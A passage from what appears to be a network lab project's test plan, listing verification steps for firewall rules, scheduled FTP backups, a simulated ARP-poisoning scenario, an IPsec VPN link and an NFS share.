Step 4: Delete the iptables rule to allow the client to browse the web server again.
Step 5: Again at the client side, open the browser, force refresh the web page, and check whether or not the right web page is displayed.
Step 6: With all the other iptables rules in place, test all the functions of the project to check whether or not they are working well.

Backup Test
Step 1: Start the FTP server.
Step 2: Change the FTP configuration so that the backup process runs in the next couple of minutes, then restart the FTP server.
Step 3: When the designed time arrives, check whether or not the files are backed up to the local file folder and to the remote device’s file folder too.

Arp Poison Test
Step 1: Start the normal web server and the hacker’s web server.
Step 2: The hacker sends fake ARP messages to the client.
Step 3: The client opens the browser to enter the normal web page; check whether or not the client sees the fake web page instead of the normal page.

IPsec VPN Test
Step 1: One server pings the other (ping -s 4048 193.168.1.104).
Step 2: On the other side, watch the status using the command “sudo watch ipsec statusall” (if the number of packets and the number of bytes increase while the ping is running, things are running the way they should be).

NFS Test
Step 1: Start the NFS server and client.
Step 2: Put a file into the shared folder on the client.
Step 3: At the server side, check whether or not the file exists.